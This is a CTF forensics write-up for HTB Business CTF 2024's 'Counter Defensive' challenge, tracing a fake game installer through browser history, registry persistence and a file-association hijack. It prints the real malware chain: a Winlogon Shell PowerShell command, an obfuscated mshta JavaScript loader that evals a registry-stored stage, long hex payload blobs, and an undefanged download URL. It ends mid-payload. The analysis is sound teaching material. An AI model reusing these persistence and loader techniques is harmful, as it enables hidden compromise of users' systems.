
Counter Defensive

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Counter Defensive
  • Category: Forensics
  • Difficulty: Hard
  • Points: 1000
  • Description: As your crew prepares to infiltrate the vault, a critical discovery is made: an opposing faction has embedded malware within a workstation in your infrastructure, targeting invaluable strategic plans. Your task is to dissect the compromised system, trace the malware’s operational blueprint, and uncover the method of these remote attacks. Reveal how the enemy monitors and controls their malicious software. Understanding their tactics is key to securing your plans and ensuring the success of your mission to the vault. To get the flag, spawn the docker instance and answer to the questions!

Writeup

The evidence.ad1 file is an AD1 logical image produced by AccessData's FTK Imager. AD1 is a container of selected files and folders rather than a sector-level disk image, so it opens natively in FTK Imager but not directly in most other tools; the practical route is to export its contents and feed them to Autopsy. Steps to view and analyze the file:

Download: https://d1kpmuwb7gvu1i.cloudfront.net/AccessData_FTK_Imager_4.7.1.exe

Open it in FTK Imager (File > Add Evidence Item > Image File), right-click [root] and export all of its files to a folder of choice. Then add that folder to Autopsy as a data source of type "Logical Files", selecting the exported [root] folder.

Question 1

[1/10] What time did the victim finish downloading the Black-Myth-Wukong64bit.exe file? Please, submit the epoch timestamp. (ie: 168061519)
> 1713451126
[+] Correct!

forensics_counterdefensive_1

In the Brave SQLite History database (AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\History): forensics_counterdefensive_2

Downloaded from: https://download1511.mediafire.com/rsvizt6owdfg4TUq0OMtEdAUdBHsJZJfBQS6pRh2aqRgAAzcwbZky4V7_T4CeXii84pCERW0YxlMODSKTqGDSO4zwDUNlh2fveX3WO1776cgljOdHQFxJb85EK3K9hQ31AWeIsLd8mozJKlWiZTkvuFd7tkOi7V8dUGoJDg_OPE2/6g06ggifplxkwyz/Black-Myth-Wukong64bit.exe

Defanged: hxxps[://]download1511[.]mediafire[.]com/rsvizt6owdfg4TUq0OMtEdAUdBHsJZJfBQS6pRh2aqRgAAzcwbZky4V7_T4CeXii84pCERW0YxlMODSKTqGDSO4zwDUNlh2fveX3WO1776cgljOdHQFxJb85EK3K9hQ31AWeIsLd8mozJKlWiZTkvuFd7tkOi7V8dUGoJDg_OPE2/6g06ggifplxkwyz/Black-Myth-Wukong64bit[.]exe

SQL Query:

SELECT
  datetime(start_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch', 'localtime')
FROM downloads
ORDER BY start_time DESC
LIMIT 10;

Chromium stores start_time (and end_time, in the same format) as microseconds since 1601-01-01 UTC; the 'localtime' modifier renders the result in the analyst's time zone (EDT here), while the challenge wants the time-zone-independent epoch value.

Download Started: 2024-04-18 10:38:33

Download Metadata (forensics_counterdefensive_3):

Download Ended: 2024-04-18 10:38:46 EDT Epoch: 1713451126

Full Path: C:\Users\IEUser\Desktop\Black-Myth-Wukong64bit.exe
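The same conversion done outside the SQLite shell, as an added example rather than code from the writeup. It reads the real start_time/end_time columns of the Chromium downloads table, converts them from WebKit microseconds to Unix epoch seconds, and renders the result in UTC so the answer does not depend on the analyst's time zone. The History database here is a constructed in-memory stand-in with one row whose raw timestamps correspond to the times the writeup found; the URL in it is a placeholder, not the real MediaFire link.

```python
import sqlite3
from datetime import datetime, timezone

# Chromium-based browsers (Brave included) store download times as microseconds
# since 1601-01-01 00:00:00 UTC, the Windows FILETIME epoch.  The offset between
# that epoch and the Unix epoch is 11644473600 seconds.
WEBKIT_EPOCH_OFFSET = 11_644_473_600


def webkit_to_epoch(webkit_us: int) -> int:
    """WebKit/Chromium microsecond timestamp -> Unix epoch seconds (UTC)."""
    return webkit_us // 1_000_000 - WEBKIT_EPOCH_OFFSET


def epoch_to_utc(epoch: int) -> str:
    """Render an epoch in UTC so the answer does not depend on the analyst's zone."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def download_times(con: sqlite3.Connection) -> list:
    """Start and end times of every row in the `downloads` table, newest finish first.
    target_path, tab_url, start_time and end_time are real columns of the Chromium
    History schema; the time conversion is done in Python, not in SQL."""
    rows = con.execute(
        "SELECT target_path, tab_url, start_time, end_time "
        "FROM downloads ORDER BY end_time DESC"
    ).fetchall()
    return [
        {
            "target_path": path,
            "url": url,
            "start_epoch": webkit_to_epoch(start),
            "end_epoch": webkit_to_epoch(end),
            "end_utc": epoch_to_utc(webkit_to_epoch(end)),
        }
        for path, url, start, end in rows
    ]


def sample_history() -> sqlite3.Connection:
    """Constructed stand-in for the Brave History database: one download row whose
    raw timestamps correspond to the start/end times in the writeup."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE downloads (id INTEGER PRIMARY KEY, target_path TEXT, "
        "tab_url TEXT, start_time INTEGER, end_time INTEGER)"
    )
    con.execute(
        "INSERT INTO downloads VALUES (1, ?, ?, ?, ?)",
        (
            r"C:\Users\IEUser\Desktop\Black-Myth-Wukong64bit.exe",
            "https://example.invalid/Black-Myth-Wukong64bit.exe",  # placeholder URL
            13_357_924_713_000_000,  # 2024-04-18 14:38:33 UTC (download started)
            13_357_924_726_000_000,  # 2024-04-18 14:38:46 UTC (download finished)
        ),
    )
    con.commit()
    return con


if __name__ == "__main__":
    # Against real evidence, open a copy of the exported History file read-only:
    #   con = sqlite3.connect("file:History?mode=ro", uri=True)
    for row in download_times(sample_history()):
        print(row["end_epoch"], row["end_utc"], row["target_path"])
```

Run it against a copy of the exported History file rather than the original: the browser keeps the database locked while running, and working on a copy keeps the evidence hashes intact.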

Question 2

[2/10] What is the full malicious command which is run whenever the user logs in? (ignore explorer.exe, ie: nc.exe 8.8.8.8 4444)
> %PWS% -nop -w h "start "$env:temp\wct98BG.tmp""
[+] Correct!

From NTUSER.DAT, Registry Explorer - Recently Accessed Items (UserAssist run/focus counters):

Program Name	Run Counter	Focus Count	Focus Time	Last Executed
C:\Users\IEUser\Desktop\Black-Myth-Wukong64bit.exe	1	0	0d, 0h, 00m, 00s	2024-04-18 14:38:57
MSEdge	1	1	0d, 0h, 00m, 07s	2024-04-18 14:55:11
Microsoft.Windows.Explorer	16	29	0d, 0h, 09m, 04s	2024-04-18 15:09:24
{User Pinned}\TaskBar\File Explorer.lnk	16	0	0d, 0h, 00m, 00s	2024-04-18 15:09:24
Brave	4	5	0d, 0h, 06m, 14s	2024-04-18 15:10:26
{User Pinned}\TaskBar\Brave.lnk	3	0	0d, 0h, 00m, 00s	2024-04-18 15:10:26
C:\Users\IEUser\Desktop\FTK Imager\FTK Imager.exe	1	1	0d, 0h, 01m, 28s	2024-04-18 15:10:46
{Windows}\FTK Imager\FTK Imager.exe	1	32	0d, 0h, 19m, 45s	2024-04-18 15:12:32
{Windows}\TreeSizeFree-Portable\TreeSizeFree.exe	1	14	0d, 0h, 03m, 44s	2024-04-18 15:22:16
{System}\notepad.exe	4	2	0d, 0h, 00m, 11s	2024-04-18 15:35:19

forensics_counterdefensive_4

NTUSER.DAT\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:

  • explorer.exe, %PWS% -nop -w h "start "$env:temp\wct98BG.tmp""

Question 3

[3/10] Referring to the previous file, 'wct98BG.tmp', what is the first process that starts when the malicious file is opened? (ie: svhost.exe)
> mshta.exe
[+] Correct!

All of these files appear modified at the same time:

Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Temp\wct98BG.tmp
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Black-Myth-Wukong64bit.exe.log
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Preferences~RFda73d.TMP
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db
Custom Content Image([Multi]) [AD1]\\\.\PHYSICALDRIVE0:Basic data partition (3) [61110MB]:NONAME [NTFS]\[root]\Users\IEUser\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

forensics_counterdefensive_5

The .tmp extension is mapped to a custom ProgID in UsrClass.dat (HKCU\Software\Classes\.tmp, OpenWithProgids), so "start $env:temp\wct98BG.tmp" hands the file to that ProgID's open command rather than to any real .tmp handler:

C:\Users\commando\Downloads\image\UsrClass.dat:
  Extension: .tmp
  Opens With Program IDs: AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m
  Timestamp: 2024-04-18 14:40:07

forensics_counterdefensive_6

forensics_counterdefensive_7

UsrClass.dat: AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\Shell\open (default value; it base64-decodes to the Vietnamese taunt "không có đâu bạn ơi hêhêhê", roughly "nothing here, buddy, hehehe"):
a2jDtG5nIGPDsyDEkcOidSBi4bqhbiDGoWkgaMOqaMOqaMOq

UsrClass.dat: AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\Shell\open\command:

"C:\Windows\system32\mshta.exe" "javascript:LQ1K5zw="";a1iNBf="9nyGCOq9";Th97=new ActiveXObject("WScript.Shell");Bff9D="B";alB4E=Th97.RegRead("HKCU\\software\\Classes\\Directory\\DisplayName");Uv42jf="H";for(eXbWF7Uy=alB4E.length-1;eXbWF7Uy>=0;eXbWF7Uy-=1)LQ1K5zw+=(alB4E.substr(eXbWF7Uy,1));NS1M5by="";for(MR1L5ax=0;MR1L5ax<alB4E.length;MR1L5ax+=2)NS1M5by+=String.fromCharCode(parseInt(LQ1K5zw.substr(MR1L5ax,2),16));eval(NS1M5by);hsI4L="T";"

Cleaned up (the final eval replaced with an echo so the next stage is printed instead of executed; run it with cscript.exe, since mshta has no WScript object):

LQ1K5zw = "";
a1iNBf = "9nyGCOq9";                      // junk
Th97 = new ActiveXObject("WScript.Shell");
Bff9D = "B";                              // junk
// Stage 2 lives in the registry, not on disk
alB4E = Th97.RegRead("HKCU\\software\\Classes\\Directory\\DisplayName");
Uv42jf = "H";                             // junk
// Step 1: reverse the stored string character by character
for (eXbWF7Uy = alB4E.length - 1; eXbWF7Uy >= 0; eXbWF7Uy -= 1)
    LQ1K5zw += (alB4E.substr(eXbWF7Uy, 1));
// Step 2: read the reversed string as hex pairs, one byte per pair
NS1M5by = "";
for (MR1L5ax = 0; MR1L5ax < alB4E.length; MR1L5ax += 2)
    NS1M5by += String.fromCharCode(parseInt(LQ1K5zw.substr(MR1L5ax, 2), 16));
// eval(NS1M5by);                          // original: execute stage 2
WScript.Echo(NS1M5by);                    // dump stage 2 instead
hsI4L = "T";                              // junk

Question 4

[4/10] What is the value of the variable named **cRkDgAkkUElXsDMMNfwvB3** that you get after decoding the first payload? (ie: randomvalue)
> CbO8GOb9qJiK3txOD4I31x553g
[+] Correct!

UsrClass.dat:Directory\DisplayName:

forensics_counterdefensive_8

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.exe32303831326038343332303632603932303230333660316736333332366033323464356137323136353131313433336433333032366035303736333532313933366032353231366336613160346336673030363234623365336333623360383237323135316036303362336638303730363637333732336731333231316034333561303235613162356735603460366432623333363136613135353332313432356335333163303238313335323139333660323534303261353034303260353732303162323236343930373732323932363633333263393331333462366133623662356131313532323134613260356537373032326032653036383135633663383132613531343231623830323133323661363335633730346139333532336236633660326031343362383535323231366331323032366734623363366135333333313430313432343231313433316736373032316036653036383135633833346732603331393331323632353136633330323535303163323633633930373732633261373231303733356434603932343334613260316136603332363232333733383138303336323031303432323033623733356132303436336034323937323235333932333236613335333131303367363335633730346137323332303130353532336036303560316531603630363637333360303231323333336134633461313436323036353031313260336439303661383036653036393330313633326132353832333233303460346332633261363233303131326333653231363231313261353234613033373735323237356133323332303233353363336138323333326330323430356735603160323432623161373235623730323334313032366039333832363339323335333136673660393332303231393134303260313732633163393038303433373030333562346138303532326335333362313235633531303431313733363131673733393537333931346131633330383135313332383734333132336738303932326338373467363335633730346137323332303135303360326037303335333633333360363634613463353031323832313235623662356135323933356733613232363031313931303133353736326135313432356335333163316734313932326333633562326035633030303336303432323332633162326034343832373030333562313031333333366735323363366134633733383138303136303235603432336031603032356131303134353232623332393236333832316332603633353235333261363336333561336337323632333336623660326036613265333
73460353336633160316032603635383330323437353135613732313639303561343331363530373330323030343633603031363234373433346333673261336035323637383135323630303034323263336036373362363233323260343333373460373739313132346033323730303039303537303334333560393633623332316035653433303236603331366735323163353332613632353131673730343235313332393231603262316535613832346034673160383031333161313130363232333735613332333233633232366337323662356131603732336335313131326036373131393130323161383739333262316035323533356332673430326138323232373034603262356536633832343233623332313532333730303333673160373739313735383331633830333231323433333332623032316331313267326330343737333235613165336739333431326136603232353135323261336030313632343734333262383531303230333134673363383031333161323533673460323332633363333338373660383234323437346135613632336336633232323234303160333335603460373633603331326333603830336332673661323231633232313233353832326130333832333231623365353332333363373537363732383231303732353238333431383332603562326230333660326331303561343336363237373331603030303632333132363331623932326338373632383033633533316232333663393031303832333231373332373231323134336233363333333339313635346332633030333336613260383437323160316335313033313235343032333330323430373036333262323038373831336331633661323234633833316338313162356135303362336030333662353332333830303337303363373739313735326032633533336331313133313436323731353237373561343335303930336231323563303732323531353232613360303136323437343334633367326133603333323536303531356136623230326135323430303337363133363237323233333336673660353033613632313130323632383334603131373332343333336232603661303738303331393331323632353135323837363335313232393335333130323035613362356031333332316333603134343339353160326732363362363234673133383233603133333332623032303631313432346032303262373339303460333632353262326333603232303136673932336033313332353331603262366535603732346032623033353339303634353030373360393232313733323236333735336236603633303330333361393334333161333230343531373
33660346039353261323136373162326035313432356339333163366331623831343037303636383335613260353031633233333038323336346036313130336333333730363532313260363332623033346035323262356037323364333733333560353035353335383237323261336032313933373136333731363731323233393232303530363032603433336338303133316133323736333336333531393034633263323238333830313332623033346037323332356035323165363034613632333134363932353133323730323534313663303035323431343233603233343037303636336235603037356031623232356132633336383035373160303334603432323238333830326238343930393034363531303331323430356033333560383132673831356336323563323332623263326033603532316335623261363030303736353039303537326332613460313039303367346032633530333231603933393233323031313331613930353232633630303233603534353037323160333030363232316330323330363338323332373032353331323239333533316235613530336235603433346035333833323431313337333235373663373236323267313338323930336334643433356036633362333334603235333736343632316130363235383231633261366032623837346739333163313235623232326235303736363134603262336330353133393131613337316035623931383035323467373533623660333234643561373231363531313134333364333330323660303135353932326330323562336033313663373039323531326134373632313334653833326336613463366335323360383034333935346037333166363538333667366036303431313339343432356130363930313132603136333332323431383536303632326338373632323331633833323236323263303230303933346332653263313036313437366330353163343035303565326337313530383036323937333531653661313335313433356136323930343233603337323737333032356534363632373231633467363332623667333039333431326139333732336234303931373335613460366335323360303430323366326034333461366035323667316333323660346734333733313232633433346135323265323130333561356136353232316333323661393338323332373032353032393732323533366336613663383233323433333231353160366131613336383334623461336330333630363538333032326232633262346139323332326733603530353033623132333133673160346331673661393330313633326132353832333233303460326236613130383
23332356335303135346333313335303737323037313034613360366332323130343236623561303239303663353030323360333432623333303230303730363335313232393335323262366337303360346337333830363234623235323135313461366231613632323331303160393535323163363133323332363736333130343236623160373335613032353137323232346432303333356033353667353334313432356335323262366332613235326231633830353335633030373635303160333032633261373234613033336630333932313133633663316336323663336136623934393139303132353130333132353433623460356039303635323234633663356235323363373334673460323137323532313535633930333236303930336333623633303338303432333731633832373235353232383336323663383030323333326234613931393032673933316530323732356135623437363235323833326131603231316336323233316331323361366035303730363632303532316235613261323231303833316532603430373233323460316337303832393031623631393035603332343230333360336433323733383034303736303530323330353231353263336335623831303136673837333534623360356038333260333230323133356030343131336636603263303233633660366730313333333233333160326232323162343331313830346434333161346035303535323231633832336032353262363738303533383234323563353333623261343336313160316235613261323232303362373033633362316033333532383231623833333233633160326232323732343337323732316530333461346030313164363237323632316332333163313231633632373231323163383134623331323135313432316238323260323335303262373636603533303233633660373330313530336032623560303236603563316031303360303633323733383034303267353333633132343136333463383234303233373138333563393331303331343231303560326235603132393338343531363032603832316633323460393339323332303131373262326235323932313131673733393539303831326033653230346032313332393236333832316332603633353236673837363336303461353139333461356235303660336038303433363033633733323033633333303036353833373238323262303437323536393038373933323136663331316233303034353132323267326734303230356236603360356134633260326534653633333234613232323337303460326231623164333537303262313230313163326336303362326634603033303
3373131313467333733333235393234613032353031353660343331363933393134313261363139343135373338323830353436353567346436623533333132613430333531643461303430363032373133603362336039313531363631353730316235333162373231303734356232303162366233613235393433633561393431643636366634603461316235323233393436613732363035333732316335333164393536313735336038323133326231333162353132303133373238333335333335333932343734653460343337323667333432303464313437363232353334313533343232313431346336373834373532653636323432663437393533353534393534603036336034333363393032313633313136613567363634633730363232313460343035303034333733313730356532643030326234303232343237323232326132333161383039303135343233623363333033373360326436653662346339303434383232623661326035603032316133323332383238313260346231613737383737323134353036643636356233373835373234323463323232333367316236313231333035323932313532333663356336613531346332613932343434303267346536333162373533623933323035323032363634343032353030363262326230323235333036613032336137373333363332613163343032343631313031313031333034633165353431303633366336623137346233353361343133623835393538313430336336653261303332353337313132643563336739313460313734333536393036313637346034673630366334633533366033353237366139313561363735313231366338323732393530333660356033313663353335623434393136333263346333313437313435653433313031343431353133363033303139323664313133313737336230363335373237373432326333313932343736303634346339373432323036323132316131623533333131603730343334303535383238333432323232643237356236303633383239343231313333303430363033613336316235613630393031373261322d3a463838784b3229765156335157626875605e6a73324546405e48766371337c473e436038437c4b47664b624149664d6a722d3158794a56555f65587d4d6a6443653e65416b322c41577541467144687e4652747664484038737251385e4a7c45743d464e65533454516a6a72573747322d32744a646654455d46496434684946516459605e4b67486b32214071597a4868634747633d69333d6271487b675640335934614441614e48735b617f6377524d4730522d307c4957757943463c487270345f42655a774c6d6

Eval:

*mlGzUbOT0rxL6CIuwYLp="P7MBWsoqkSxNAaDAd9S0FWkxArm39m3gGChhJyQpA";hGkNPiTaVIHd4iFMUDVdjDr="7G7RzjaTT3UnFM4uLzNX1Rsx0HDftrVNxdAvAEwQL";aEn5cDjmMxUoUVZIxQ="zmFiABkFgKLsH0cN7Ls1sfxNPFEB3znPexbgQS6QVy";Hx86J="1b7109061e2a631c0604033112492836062e724b22243828550434070a13352a1a21260224793d46067429133b24772753602c7713114f2910306315144101345e4174133d3b3619442e353f130e0f305927283f1215761e191f72530f353d3f067d0d7616096534710d197c3e4b117352301b5f3c041859582c141c532d712f3f3601455a3d031011011642043a1b3633771c201f0352202b2b6005204466202502392c572a365d7b0444291b3d151f3e3f325129250312162a7c32223d242758732e664f05412778771a2d0b182823231a200e0b1f2b2844093d2f5f4b0c73033c2c245109081a321b22272422042b004b5e0713734005040d1226073d667e1f113612093c340c600d59455359746b42665b5748763d1412243514352267414d02437f27340d5d742935335338273102152a312b31280c5716594a353a273506271f4932252a1d0d6f664a491e3c49521c2f2a022e4701272a352a07516615190c2c0c172060401d4a53041b13352f4d7e56450828375149161b14193961340f5105201d295233737d111730300d6b2c063b3a10212b07534a2a2b0d0732221d23365d5b0b3d1e0c0f2e02047b7b221540032a136f123978096527402b2827385600333c02373c0634080c0f052e1d39151d0636787f25360b3a28362923120d025c0b180959377a1129252b2b71102329390d236a280b06154839210e2b0e01241301393e38173204283d3614213c357b04083723600c010a3e0f200e2b0c0510370f3c20350f672b05320b282a241512132d183a2127263a213a323a2627264a100d1d305a27273427222b0a3c23382a2825330a2c3c072c02221b1e2a0a16341b2c353e24283508762b520c283a2255050d1a344d0811342a222b0a332333107f0f3c203b0f6c11400e3120230b380e0c2d53787f10182e3c3b512503205067040837234c0c3024230e09162a0928073a0d2327040b5a3801221b1e2a25026607050f1c213a32263a120a1b382526742e1e27205a397b09191d2b3320083f2638225527283a73240830362c3c090623093e512527120d7d373c252e3f3d2256090e0d2c45213015210919492f1c3f263a3f3c1129306c301d271b3b030a0567003e35083a2b521b3f2b253e2414357f530e33024d222715201e370a2f240136762323163a25590a0132261a2f1d1512522d2608373d0c073f2b2539221536070020332b430c20053f09201e2f2401223f0c1d0170277053133d51053e23280
11f2b0d032328521b3610391f7a3d0a7c13212c05050c7b23291d2b3b2b20385606303c1d2d38631a1f0a51233423283f1f3f3522792052072328391f233a22561e1e30125b251d343b2137347d0f233a7f250f1d340b6c20400c253f0d1e3719042c27391b1439037f2b367d3a2726645e203772730c2409261e3415311f5a5379260805173b5e05043a503f7416013b5b3d3900203b2622383a3226783b260658142233610b1109601e24493114060f7f38566a370d5934080c253f3d1f3b385d3126741b1529073f130c2e203b2955100f20334c34111561271e4d230f2c577d2508192e0a731a1931503c2b0d1667052b222e213a397d782b0f1b3a2852601a264673520d332c3f0e344d3c0928317b26273f752373114238350d340e2c051e2a35392213520723283603203a2260030a2705450c20063b25091a31102329390a23053b0d7c09010d1b3b7509056700061b2e3a250c0b3b2b323e263e187b180e330e04213015640909482b083822240d300a7508633b1e222a0e700e2c660704320c241425003f1452072315296413261d065a250e23270d302b310838223b3d0915363367231a31083c340b0605022932217617361739120c1b27285355050e33734c270e2b250d302b360b125607333c01160d632803323a050b1e38660704182a3f3a393e24150b2a76121b590d0f371540231a34391c3030360f2c5736223712290c7005460935302b0d270e5f2b0a3523130c297f10220c3b2b52630d09372b020d241160202b33310c28317d262c627b0a5934410c3a23310e2c1e020135392215367825152621391308701f0b2c334237110d38262011261c050f7f3332272631673004251b022f1e150652330c1b7c3d347426100c1b251522703e212c0905341e772517264131113c353b0b5719773c07300832352f300c2c051e2a183a383d221f3a3c1878022b360704203320452130153a0a27480b1f33003b3d56193333632c4121272371232801093f322a353c0826783b292a36213260000a377266341e013b0f302b2e0b381438252701282767573c32355c2a2328301b285321223a221f7b3c080c3b130c670d0e330a0422223f3c261e1d7424280f78333c3b320d7c521a31083c7d130201582b347426100c1b2515220f1b14397c5a1e2377403b7b113a202b33342123083a385719770a7c30073251232c24283f5e2b0d0722281b047b3e35250a2b39781a201911760b11153c270a1e2f273f223c23231e732260111a31080a7d0d281e5a2b0a29231524077a15261b353a257f130f20345e0a232c690e343075090007230d2119770d73340b23262c760c3b240006251876250c1b7c3d347426100c640020370561341e0961271e15742038560b0a0a3f350d735
b1f0b0f2f3326273c1e36361b3525360b3a283629232b2541011e200a0c240e20610818373d1f3c257f3331012e300728440b2a3b32240630003e0b2e3c3b29147a3a353e24151b675310191106221c7e39251e2f2e212821053d1d660c336353070b0c051023271d073e367d783b29087c213478231518033a1d193759377a16371140153e212c353b25081d2e30073408093a3b710b04191202390f7f1353293628390f201432072e271a2b420a0e7e04203b33281c3c532023231e722577301d251b1126125c3b1103261b3b3d0d032328521b361039605f081f094c0b11056026411d3d1c3321200c3766060a5a0e060c25501023271d073e367c0113531f2329352279240c64021e372c02240102630818373226230f1a0b1d34290d4e3701271b3b77093c623a0552033f15262139130b7d383e18605f0a20767a34112424104133351f3c2d7f20213f1225582c410b0f3f2c25391d073e361f2312082a24151b183f3e18605b0b20775e0b1d1225111e2f2c1f2d31393b33662922770946222a02750b04051b04520f39125318203a353e241235511f16332b4f0d0e7e2a1e201e340a12317c27376607086c2c060a5127280c2c3c5c2d26007f3d0a1f3f12520f39125367050f20334c34111561271e4d230f23367a0f3020290b6023480b1802230c2c30042e0f3e3617393e3817393e7b1739415b222c344f08113428222b0a712333107d0f3c20720f6c11420e3120301d06160536182e3c3b520b051353033c28397c101e2c094d3d1e7f3e08301d0d1612003c2356062c25770608320f2f2e0d16200504082e3c3b5318213d2229233b1845041220374d3d1e7e2a2641237421592621252737080b5a331f233102311204013a05260b2523322a20265103062837780e0920024f2578331417343f171d3f0035225527063a73242230362c3c0a3c3c183050037f120c213a2b507c2d20515a021118770023202c200d301e2d201121760c1e1d7b0c4e34480d182f7d22151d52021b2976141b1f76141b1776141b5a530d1d0641342024621d413c3d0f121421330e092f275d010222183876093811063e0b2a213d222e7f2b2529253b1845041d46164d372024230e091a2a09280038301d3031234e281a31310a370d1534133d082e3f3e181f213c350876130b590d0e33244d213015210a273c7d2701082823233c73264d304425182c7d25053c0c2d2926353e181f3f3c257d263b2651120923060324012c2a092030730f2c003639333f3b0b67231e210c1a332137241201393e7f17393e3517393e371739415b22270e413420233f203b2b3326110c3925563f2f30065b04221b1e2a0b5d3c052b22292210322e3c3b537c233b1845041e0d735b220a23270e0a1273243c3
a20253366340d77231e3c0f3f770b3a6e02060c1b2515220f1b1439037f2b36021f12332f4c341e013b25244c2a0900527e0d2305762277301c3135113e1d3c2000350b043f3a3278172836217f255307060f3002452511333c21341574233f173f330d3429085e2b1624352f311d2c1600350b043f1453213613320c3b2739781a0d370d5a0a01152727091632095925380837667233631a1d3251232c253c621d040c2e39280c747f3b222a241035731a084709590c24151e1e2b373e1c3c072339561d2d306c30170935387d0d2c3000060b18373a32177f2b39257f2132602d091d06022130063b1e244c760a002d1f3d3211143f7134223c092f0a153c15123d360339130c782328521f232b22770d0d1a76590c01093c210a2b030801522d335705323372524727095c28235f335a06361c203a327821153621243e507c062037767f0a0e1124113b3332262c35360d2c38252277051e210c1a3c2137241101393e7f17393e3817393e3617327b1e1e1d23432430303e17360d001338003c2356663633635741221b1e2a0804332c3e34290828341b3a3b183a21150c5e130e0d2c4522250d16273401061c59362023543705306701023f53277424023b2435507c2d2851250d120d7d7a3c08591a0d377640371e763c0d301e2d201121760c1e157b205d531c22520a2a0b2c333d34341c213a320c3b150c0b3c1536670d0e311e4c217b2b29262038301333293f2027192d0d7c30060b1806320b5d111c0632787f2b3635232b5207271332071c2719244337247e600e301e2f243f223f25571d2e0b59303f323a273e1e3833073753032028391f2910361c763b225501251e124d251a1d601e2b117415383108240d1275264d231a32355c760804193b33370f1927241b1c250a0b012332701f1e2c2452377b7e25261e2f2e212c0f390b0d1625205a52460935302b0d2838122e227c3f1253783915220f2d1036075a1c272b02240e282914273b7d0a58072008332b2e227027010d1b01342402670c2b371b3610320c2610291f7f12297f5c080d7e5d0d0e2c2520342f371f3c0736303363370b07281f24502332232c06042d2626383a3274212b391f19122660022033114f27202c25271e2f3e213c1b7f0f27057508633b1e2225063d0e2c661803220c242918787e12261f271526640c252316450b3015210919492f1d12567e0a23012a0d733417093538730d2702592b221f363f257d242918783b2b397c101d2323592227153c213b282309332d380b233f7220772b46271b207326380e042c221f7e3f080c3b1326213d2b3273011e0e0e45270a7626271a382b0f23367d202762310863161d21213b2825010e5d3651740124271b1a233707002034032c0f2706410c7a0
e370f302b750b02223b0b233f303367231a3a0820340e2c661d04080c203b29187d38227c3c103646060d370d5d0c0e30390f2015730f232a383937022d237c2b410e250528222c3c12370814371724747e15227c1b1529781a261924020f1e1e3f0d1a3023093c35372027013b24770e46222a2033173c3002021b0b76141b0f76141b07763808731e1e1d065b0c2024230e422b2c265910283b236b2c2577061d21312c2a0c37670003352a763c25397c1026213c2b32550120202052221e3f600d302b3d082856023333662c0d7305010d1b3b3d0a3b67112835267a3e5321223a222a24120b77180e3c1201251a763e2030382f2601223a3d2305373307301e233a1a2f240512522d2904383d0a3523130c297f102267100b202c00081e2b29262038301333293f2027192d0d7c30060b1806320b5d111c0632787f2b3635232b5207271332071c2719244337247e600e301e2f243f223f25571d2e0b59303f323a273e1e3833073753032028391f2910361c763b225501251e124d251a1d601e2b117415383108240d12742077331e222451312538011104530b212b32783b2b390335283656061c462b5e251e05250e301e2f2601223a3c57052b0a07300809355c2a0c2c055a28223a24120b083f3a320c263e18605b0b37340c24010e28222b487d1059357f25313f72336353200b0f50331d371d5b02320c203a222a26141b0f76141b7c53210e010c0b330d6921092b7d0c02223b330d370b3a042c27270c3316150634182d511709130f173f12082e3c3b530b1f2623125b220a236211201a370f59567f231d3832255a281d3d271106165d02042d52171d23082e3c2650031a240c5e1f164576573f7b2f12271f49710802083f202762373063531d21210e2d22151552021b0b7638087c22382229193b1845042733155d0a0e123e0f2038302106253c0d33062523730d080e3a597960467e42455a3b3c3e5529722212757c5f3347046c56040f321510392a17163336373f1c1017040d3e02562d3435002a23002018370e3a2a0332252a1d0d111307501c5a1828375a192c35232c1615286b0e1b2a490d363a4910071f1e58053d3d1e3f494b51617e585a302c10152e2759041b1139172b5a1d2c6f797f";KXLThQx1eIEsgIxNgwK="YTA88niSJLrPqLRUZCKqgETbyiLCOPZJSvgrdh";BKuhfIMaVHImUOt9FreZ6I="s0c2lY2yYE5Ul8b3hDBuPh6pUWwP96Gud5OETJurjWho";XeFMutnVMmJxSjDGPQ6UWW="nQdtB3Q3HMdUmrMfjYdw8Ck7ZnfMqpnmO9RuB6VRWruZ4m";GL1F5ur="";for(lEiDM7Bf=0;lEiDM7Bf<Hx86J.length;lEiDM7Bf+=2)GL1F5ur+=String.fromCharCode(parseInt(Hx86J.substr(lEiDM7Bf,2),16));GFyZLq2IlwZiswVshlQO="8i0Bs6Ro
